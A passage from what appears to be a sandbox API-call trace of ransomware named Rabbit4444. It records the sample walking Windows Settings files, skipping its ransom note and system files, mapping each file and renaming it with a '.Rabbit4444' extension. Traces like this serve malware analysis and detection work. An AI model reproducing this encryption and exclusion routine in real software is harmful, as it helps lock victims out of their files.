lpFrequency=0x130bfb8*=100000000) returned 1 [0058.600] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14991064194) returned 1 [0058.600] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=837) returned 1 [0058.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0058.600] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0058.601] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0058.602] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.602] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.602] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.602] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.602] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.602] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.602] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.602] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.602] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14991325680) returned 1 [0058.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.603] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0058.603] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.603] CloseHandle (hObject=0x298) returned 1 [0058.603] CloseHandle (hObject=0x278) returned 1 [0058.603] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms.Rabbit4444") returned 192 [0058.603] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.604] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d5140e9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4d5140e9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x222c36c3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", cAlternateFileName="CL5165~1.SET")) returned 1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2=".") returned 1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="..") returned 1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="windows") returned -1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="boot") returned 1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.604] lstrcmpiW (lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.604] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms" | out: lpString1="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms") returned="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms" [0058.604] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.604] lstrlenW (lpString="Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms") returned 64 [0058.604] lstrlenW (lpString="Rabbit4444") returned 10 [0058.604] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.604] lstrlenW (lpString=".dll") returned 4 [0058.604] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.604] lstrlenW (lpString=".lnk") returned 4 [0058.604] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.604] lstrlenW (lpString=".ini") returned 4 [0058.604] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.604] lstrlenW (lpString=".sys") returned 4 [0058.604] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{420c524a-2a76-43f7-b1b2-c3cf736557c7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.605] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.605] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14991548914) returned 1 [0058.605] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1116) returned 1 [0058.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0058.605] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0058.606] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0058.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.607] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14991799238) returned 1 [0058.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0058.607] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.607] CloseHandle (hObject=0x298) returned 1 [0058.607] CloseHandle (hObject=0x278) returned 1 [0058.608] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms.Rabbit4444") returned 192 [0058.608] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{420c524a-2a76-43f7-b1b2-c3cf736557c7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{420c524a-2a76-43f7-b1b2-c3cf736557c7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.608] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da977fa, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4da977fa, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", cAlternateFileName="CLA394~1.SET")) returned 1 [0058.608] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2=".") returned 1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="..") returned 1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="windows") returned -1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="boot") returned 1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.609] lstrcmpiW (lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.609] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms" | out: lpString1="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms") returned="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms" [0058.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.609] lstrlenW (lpString="Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms") returned 64 [0058.609] lstrlenW (lpString="Rabbit4444") returned 10 [0058.609] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.609] lstrlenW (lpString=".dll") returned 4 [0058.609] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.609] lstrlenW (lpString=".lnk") returned 4 [0058.609] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.609] lstrlenW (lpString=".ini") returned 4 [0058.609] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.609] lstrlenW (lpString=".sys") returned 4 [0058.609] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4228f99d-227f-4058-9ea3-bb2b616d7444}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.610] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.610] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14992052679) returned 1 [0058.610] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1020) returned 1 [0058.610] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.610] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.610] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.611] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.612] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.612] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14992316470) returned 1 [0058.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.612] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.613] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.613] CloseHandle (hObject=0x298) returned 1 [0058.613] CloseHandle (hObject=0x278) returned 1 [0058.613] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms.Rabbit4444") returned 192 [0058.613] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4228f99d-227f-4058-9ea3-bb2b616d7444}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4228f99d-227f-4058-9ea3-bb2b616d7444}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.613] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dcf9d89, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4dcf9d89, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", cAlternateFileName="CLCA0C~1.SET")) returned 1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2=".") returned 1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="..") returned 1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="windows") returned -1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="boot") returned 1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.614] lstrcmpiW (lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.614] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms" | out: lpString1="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms") returned="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms" [0058.614] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.614] lstrlenW (lpString="Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms") returned 64 [0058.614] lstrlenW (lpString="Rabbit4444") returned 10 [0058.614] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.614] lstrlenW (lpString=".dll") returned 4 [0058.614] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.614] lstrlenW (lpString=".lnk") returned 4 [0058.614] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.614] lstrlenW (lpString=".ini") returned 4 [0058.614] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.614] lstrlenW (lpString=".sys") returned 4 [0058.614] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.614] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{45fdb5df-1457-4a41-a824-7ad9c75767bc}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.615] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.615] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14992554308) returned 1 [0058.615] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1000) returned 1 [0058.615] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.615] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.615] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0058.616] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0058.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.617] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14992804713) returned 1 [0058.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.617] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.617] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.618] CloseHandle (hObject=0x298) returned 1 [0058.618] CloseHandle (hObject=0x278) returned 1 [0058.618] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms.Rabbit4444") returned 192 [0058.618] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{45fdb5df-1457-4a41-a824-7ad9c75767bc}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{45fdb5df-1457-4a41-a824-7ad9c75767bc}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ddb890b, 